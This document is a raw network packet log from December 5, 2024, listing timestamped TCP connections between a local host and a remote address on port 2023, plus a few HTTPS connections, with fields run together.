                                                                                                              Dec 5, 2024 10:39:28.359152079 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.359231949 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.359280109 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.360285997 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.360359907 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.360418081 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.361397982 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.361516953 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.361603022 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.362544060 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.362654924 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.362704039 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.363749027 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.363847971 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.364330053 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.364833117 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.364950895 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.364995003 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.365962982 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.366086006 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.366146088 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.367098093 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.367237091 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.367285967 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.368253946 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.368386984 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.368441105 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.369430065 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.369499922 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.369548082 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.370592117 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.370660067 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.370702982 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.371685982 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.371819019 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.372272968 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.372842073 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.372951031 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.373019934 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.373981953 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.374094963 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.374147892 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.375143051 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.375257015 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.375310898 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.376296043 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.376435041 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.376491070 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.377398968 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.377458096 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.377511978 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.378565073 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.378698111 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.378745079 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.379790068 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.379898071 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.379944086 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.380837917 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.380975008 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.381017923 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.381953955 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.382057905 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.382102966 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.383150101 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.383217096 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.383280993 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.384273052 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.384408951 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.384470940 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.385387897 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.385515928 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.385559082 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.386691093 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.386756897 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.387335062 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.387665987 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.387788057 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.387845993 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.388860941 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.389065027 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.389122009 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.390140057 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.390204906 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.390263081 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.391253948 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.391365051 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.391405106 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.392298937 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.392349958 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.392410040 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.393341064 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.525602102 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.525662899 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.525804996 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.525908947 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.525965929 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.526031971 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.527076960 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.527127028 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.527179003 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.528388023 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.528498888 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.528553963 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.529416084 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.529428959 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.529474974 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.530535936 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.530587912 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.530666113 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.531660080 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.531721115 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.531786919 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.532815933 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.532861948 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.532917023 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.533968925 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.534017086 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.534133911 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.535073042 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.535115957 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.535157919 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.536310911 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.536350965 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.536406994 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.537389994 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.537427902 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.537436008 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.538577080 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.538644075 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.538691044 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.539688110 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.539786100 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.539913893 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.540821075 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.540864944 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.540896893 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.541934967 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.541999102 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.542000055 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.543113947 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.543160915 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.543193102 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.544363022 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.544433117 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.544470072 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.545351028 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.545401096 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.545447111 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.546494961 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.546555996 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.546607018 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.547631979 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.547696114 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.548203945 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.548245907 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.667901039 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:28.667913914 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:45.122678041 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:45.242587090 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:45.242686987 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:45.242852926 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:45.362565994 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:46.495371103 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:46.495428085 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:46.495656967 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:46.507066965 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:46.626899004 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:46.922636032 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:46.922961950 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:47.042721987 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:47.385618925 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:47.388252974 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:47.507911921 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:47.508183002 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:47.627866983 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:47.918207884 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:47.920938015 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.040739059 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.040823936 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.160572052 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.239649057 CET49930443192.168.2.7162.159.61.3
                                                                                                              Dec 5, 2024 10:39:48.239723921 CET44349930162.159.61.3192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.239799976 CET49930443192.168.2.7162.159.61.3
                                                                                                              Dec 5, 2024 10:39:48.240219116 CET49930443192.168.2.7162.159.61.3
                                                                                                              Dec 5, 2024 10:39:48.240240097 CET44349930162.159.61.3192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.241190910 CET49931443192.168.2.7172.64.41.3
                                                                                                              Dec 5, 2024 10:39:48.241250038 CET44349931172.64.41.3192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.241329908 CET49931443192.168.2.7172.64.41.3
                                                                                                              Dec 5, 2024 10:39:48.241518974 CET49931443192.168.2.7172.64.41.3
                                                                                                              Dec 5, 2024 10:39:48.241530895 CET44349931172.64.41.3192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.441452980 CET49931443192.168.2.7172.64.41.3
                                                                                                              Dec 5, 2024 10:39:48.441684961 CET49930443192.168.2.7162.159.61.3
                                                                                                              Dec 5, 2024 10:39:48.452189922 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.452251911 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.452394009 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.495466948 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.495590925 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.495784044 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.495917082 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.616039991 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616055965 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616133928 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.616163015 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616174936 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616228104 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616229057 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.616314888 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.616368055 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616378069 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616388083 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616457939 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.616457939 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.616466999 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616477013 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616487980 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616499901 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616512060 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.616518974 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.616540909 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.616558075 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.735986948 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736002922 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736016989 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736098051 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736119986 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.736135006 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736181974 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.736215115 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.736232996 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736279964 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.736455917 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736466885 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736537933 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.736541986 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736577988 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736588955 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.736630917 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.736639977 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:48.736670971 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.855931997 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.856060982 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.856133938 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.856239080 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.856435061 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.856564999 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.856658936 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.856769085 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.856857061 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.856987000 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857073069 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857083082 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857161045 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857460022 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857470036 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857480049 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857592106 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857601881 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857611895 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857623100 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857717991 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857733011 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857743025 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.857753992 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.339011908 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.361706018 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:49.361850977 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:49.361998081 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:49.481342077 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.481400013 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:49.481573105 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.481626034 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.481666088 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.481781960 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.481792927 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.481878996 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.481889009 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.481916904 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.601041079 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.890453100 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:49.895014048 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:49.895078897 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:49.895220995 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:49.895369053 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:49.895386934 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:50.014653921 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.014868975 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.014911890 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.014991999 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015033960 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015044928 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015137911 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015182972 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015244007 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015275955 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015289068 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015404940 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015414953 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015487909 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.015506983 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.388046026 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:50.437562943 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:51.375195026 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:51.495964050 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:51.496026039 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:51.615802050 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:51.906269073 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:51.906444073 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:51.906444073 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:51.906586885 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:51.906646967 CET499212023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:52.026251078 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:52.026318073 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:52.026329994 CET20234992145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:56.907063961 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:57.026825905 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:57.026927948 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:57.027064085 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:57.146831036 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:58.281585932 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:58.281666040 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:58.281730890 CET499522023192.168.2.745.149.241.141
